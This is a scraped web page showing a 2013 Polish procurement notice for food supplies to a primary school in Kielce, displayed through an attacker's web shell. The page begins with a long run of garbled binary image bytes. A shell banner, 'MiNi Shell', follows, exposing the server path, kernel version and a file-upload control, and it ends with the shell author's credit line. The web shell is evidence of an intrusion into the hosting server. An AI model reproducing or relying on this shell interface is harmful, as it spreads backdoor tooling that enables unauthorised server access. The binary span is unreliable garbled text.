JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130812/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130812/159981-N-2013.html

<p class="kh_header"><b>Kielce: Dostawa artykułów żywnościowych do Szkoły Podstawowej Nr 25 w Kielcach, w roku szkolnym 2013/2014</b><br>
<b>Numer ogłoszenia: 159981 - 2013; data zamieszczenia: 12.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa Nr 25 w Kielcach , ul. Jurajska 7, 25-640 Kielce, woj. świętokrzyskie, tel. 0-41 369 98 40, faks 0-41 369 98 40.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> sp25kielce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych do Szkoły Podstawowej Nr 25 w Kielcach, w roku szkolnym 2013/2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)	Dostawy owoców i warzyw-Kod CPV15300000-1
2)	Dostawy ryb i mrożonek- Kod CPV15896000-5
3)	Dostawy nabiału- Kod CPV15500000-3
4)	Dostawy art. spożywczych- Kod CPV15800000-6
5)	Dostawy mięsa i wędlin- Kod CPV15100000-9	
6)	Dostawy pieczywa- Kod CPV15810000-9
7)	Dostawy jaj kurzych -  Kod CPV03142500-3.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 03.00.00.00-1, 15.30.00.00-1, 15.89.60.00-5, 15.50.00.00-3, 15.80.00.00-6, 15.10.00.00-9, 15.81.00.00-9, 03.14.25.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie pobiera wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Aktualny odpis właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawionej nie wcześniej niż 6 miesięcy przed terminem składania ofert.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku  na podstawie złożonego oświadczenia przez wykonawcę.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku  na podstawie złożonego oświadczenia przez wykonawcę.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku  na podstawie złożonego oświadczenia przez wykonawcę.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku  na podstawie złożonego oświadczenia przez wykonawcę.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje istotne zmiany umowy w stosunku do treści umowy w sytuacji gdy
- nastąpi znaczny wzrost cen produktów żywnościowych spowodowany klęską  żywiołową, załamaniem na rynkach światowych itp.
- zmiana umowy może nastąpić na pisemny wniosek wykonawcy zamówienia, z udokumentowanym wzrostem cen (np. dane GUS) jednak nie mniejszym niż 15 % ceny produktu finalnego w stosunku do ceny złożonej  w ofercie. 
- Sezonowe różnice cen nie są okolicznościami  których nie można było przewidzieć w chwili zawarcia umowy i nie będą podstawą do zmian treści zawartej umowy i cen.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> sp25kielce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa Nr 25 
im. Kornela Makuszyńskiego w Kielcach
25-640 Kielce, ul. Jurajska 7 (sekretariat)
Tel.fax ; 41-369-98-40.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.08.2013 godzina 08:00, miejsce: Szkoła Podstawowa Nr 25 
im. Kornela Makuszyńskiego w Kielcach
25-640 Kielce, ul. Jurajska 7 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawy owoców i warzyw.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Banany	1440	kg.
Buraki 	710	kg.
Cebula	430	kg.
Cytryny	320	kg.
Czosnek	205	szt.
Gruszki	600	kg.
Jabłka	2700	kg.
Kalafior	48	szt.
Kapusta biała	315	kg.
Kapusta czerwona	305	kg.
Kapusta kiszona	460	kg.
Kapusta młoda	225	szt.
Kapusta pekińska	280	kg.
Kapusta włoska	75	szt.
Koperek (pęczek)	1090	szt.
Mandarynki	450	kg.
Marchew	1600	kg.
Nektarynka	180	kg.
Ogórki kiszone	360	kg.
Ogórki świeże	460	Kg.
Papryka	223	kg.
Pietruszka korzeń	256	kg.
Pietruszka natka pęcz.	2900	szt.
Pomidory	330	kg.
Por	490	szt.
Rzodkiewka (pęczek)	300	szt.
Sałata zielona	630	szt.
Seler	280	kg.
Śliwka suszona kalif.	8	kg.
Śliwki	224	kg.
Kiwi	450	kg.
Ziemniaki	11000	kg.
Ziemniaki młode	480	kg.
Pomarańcze	1600	kg.
Pieczarki	230	kg.
Brzoskwinie	370	kg.
Bakłażany	12	kg.
Brokuły	40	szt.
Cukinia	20	kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawy ryb i mrożonek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Fasolka szparagowa mrożona 
(opakowania 2kg lub 2,5kg)*zielona lub żólta	260	kg,
Frytki	200	kg
Kalafior mrożony ( opakowania 2kg lub 2,5kg)*	120	kg,
Marchew mrożona  (opakowania 2kg lub 2,5kg)*	465	kg,
Mieszanka kompotowa ( opakowania 2kg lub 2,5kg)*	1200	kg,
Mieszanka warzywna ( opakowania 2kg lub 2,5kg)*4, 5, 7-skladnikowe itp.	1200	kg,
Mieszanka meksykańska	70	kg,
Ryba filet z miruny nieglazurowany	1320	kg,
Ryba filet z morszczuka nieglazurowany	300	kg,
Pyzy z mięsem	100	kg,
Truskawka mrożona ( opakowania 2kg lub 2,5kg)*	225	kg,
Wiśnie mrożone	30	kg,
Ratatui	100	kg,
Brokuły mrożone (opakowania 2kg lub 2,5kg)*	220	kg,
Leczo	 60	kg,
Kluski śląskie	300	kg,
Pyzy ziemniaczane puste	300	kg,
Brukselka  	50	kg,
Szpinak 	50	kg,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.60.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawy nabiału.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Deser mleczny z pianką typu Korona 125g lub równoważny	1200	szt,
Jogurt owocowy 125g
	1350	szt.,
Jogurt typu Fantazja 110g lub równowazny	1482	szt.,
Masło extra kostka 200g 82,5% tłuszczu	2140	szt,
Jogurt naturalny 400g	390	szt.,
Mleko 2%  długoterminowe 1 litr	250	szt,
Napój probiotyczny 100g Aktimel lub równoważny	1848	szt,
Ser biały półtłusty twarogowy	1115	kg,
Deser typu Monte 55g lub równoważny	1000	szt,
Ser żółty twardy Gołda  lub równoważny	120	kg,
Śmietana 12% 400g	820	szt,
Serek homogenizowany 150g	1500	szt.,
Śmietana 0,5 litra 30% kremówka	780	szt..
Śmietana 18% 400g	1267	szt.
Mleczna kanapka Delice   38g   lub równoważna	1400  	szt.
Jogurt do picia 250g	1700	szt.,
Drożdże 100g	100	szt,
Serek topiony 100g	80	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawy art. spożywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tymianek 10g	50	szt. 
Kukurydza konserwowa 400g	190	szt.
Budyń 40g	270	szt.
Chrzan tarty 180g	30	szt.
Cukier 1kg	2200	kg.
Cukier puder 400g	12	szt.
Cukier waniliowy 32g	550	szt.
Czekolada mleczna 100g	800	szt.
Fasolka czerwona konserwowa 400g	200	szt.
Kasza jaglana 1 kg	135	kg.
Fasola Jaś 1kg	100	kg.
Groch łuskany 1kg	64	kg.
Groszek konserwowy 400g	136	szt.
Herbata expresowa (opak. 100szt) 130g	300	szt.
Oregano 10g	50	szt..
Kasza jęczmienna 1kg	400	kg.
Kasza manna 1kg	60	kg.
Kisiel 40g	540	szt.
Koncentrat pomidorowy 200g Pudliszki lub równoważny.	1300	szt.
Listek laurowy 8g	500	szt.
Majeranek  10g	280	szt.
Majonez  kielecki 310g	760	szt.
Makaron 1kg(świderki, rurki, wstążki, łazanki)	880	szt.
Mąka pszenna 1kg 	820	kg.
Mąka ziemniaczana 1kg	50	kg.
Mąka żytnia 1 kg	50	kg.
Mięta 34 g	120	szt.
Olej  rzepakowy 3 litry	300	szt.
Orzech włoski 100 g	40	szt.
Papryka ostra 20 g	485	szt.
Papryka słodka 20 g	520	szt.
Pieprz naturalny mielony 20 g	815	szt.
Pieprz ziołowy 20 g	55	szt.
Kolendra 20 g	30	szt.
Przyprawa do potraw 200 g Vegeta lub równoważna	760	szt.
Przyprawa do zup w płynie 1 l  Magi lub równoważna 	196	szt.
Oregano 10 g	50	szt.
Rodzynki 100 g	200	szt.
Ryż 1 kg	760	kg..
Sok owocowy typu Herbapol 0,5 l lub równoważny	150	szt.
Sok 0,2 l kartonik	1000	szt.
Sól 1kg	100	kg.
Wafelki w czekoladzie Grzesiek 39 g  lub równoważne	800	szt.
Ziele angielskie 15 g	500	szt.
Przyprawa curry 15 g	30	szt.
Ananas w puszce 565 g	270	szt.
Bazylia 10g	75	szt.
Zioła prowansalskie 10 g	75	szt.
Olej słonecznikowy 1 l	60	szt.
Orzeszki ziemne 100g	1000	szt.
Herbata owocowa ex 50g	100	szt.
Ogórki konserwowe 0,9l	90	szt.
Pomidory cale 400g	80	szt.
Szczaw kons. 320ml	80	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawy mięsa i wędlin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Antrykot wołowy		140	kg.
Boczek wędzony	130	kg.
Filet z kurczaka	1025	kg.
Karczek wieprzowy b/k	776	kg.
Kiełbasa wiejska cienka gat.1 	100	kg.
Łopatka wieprzowa b/k	288	kg.
Schab wieprzowy b/k	600	kg.
Skrzydło z indyka	167	kg.
Słonina	48	kg.
Szynka wieprzowa b/k	826	kg.
Udko z kurczaka	1013	kg.
Udziec indyczy	20	kg.
Wątróbka drobiowa	50	kg.
Wołowina b/k (pieczeniowe)	345	kg.
 Kiełbasa krakowska-gruba	90	kg.
Żeberka wieprzowe	300	kg.
Filet indyczy	371	kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawy pieczywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bułka tarta 500g	660	szt.
Bułka zwykła 50g	3020	szt.
Chleb słonecznikowy 500g	204	szt.
Chleb zwykły 600g	2400	szt.
Pączek 	400	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawy jaj kurzych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja kurze kl. I (duże)	13090	Szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com